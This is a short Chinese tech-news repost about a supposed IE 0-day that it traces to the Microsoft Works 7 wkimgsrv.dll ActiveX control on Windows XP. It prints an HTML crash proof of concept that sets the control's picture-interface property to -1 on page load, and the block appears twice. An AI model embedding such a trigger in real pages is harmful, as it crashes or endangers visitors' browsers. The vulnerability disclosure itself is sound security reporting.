IE 0day漏洞 问题出自MS Works
程序员文章站
2022-06-15 22:49:45
近几天网络上流传着一个传说为IE0DAY的POC代码,在XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的... 08-10-08...
近几天网络上流传着一个传说为ie0day的poc代码,在xp系统环境下通杀了ie6和ie7,其它系统并未经过测试。其实这个漏洞并不是存在于ie,而是microsoft works的组件被挖掘出漏洞,部分的xp预装了microsoft works,所以就出现了过全补丁系统的漏洞(如华硕易pc 就预装了microsoft works)。
影响的dll版本:microsoft works 7 wkimgsrv.dll (7.03.0616.0) 以下为crash poc <html>
<head>
<title>microsoft works 7 wkimgsrv.dll crash poc</title>
<script language=”javascript”>
function payload() {
var num = -1;
obj.wkspictureinterface = num;
}
</script>
</head>
<body onload=”javascript: return payload();”>
<object classid=”clsid:00e1db59-6efd-4ce7-8c0a-2da3bcaad9c6′ id=”obj”>
</object>
</body>
</html>
影响的dll版本:microsoft works 7 wkimgsrv.dll (7.03.0616.0) 以下为crash poc <html>
<head>
<title>microsoft works 7 wkimgsrv.dll crash poc</title>
<script language=”javascript”>
function payload() {
var num = -1;
obj.wkspictureinterface = num;
}
</script>
</head>
<body onload=”javascript: return payload();”>
<object classid=”clsid:00e1db59-6efd-4ce7-8c0a-2da3bcaad9c6′ id=”obj”>
</object>
</body>
</html>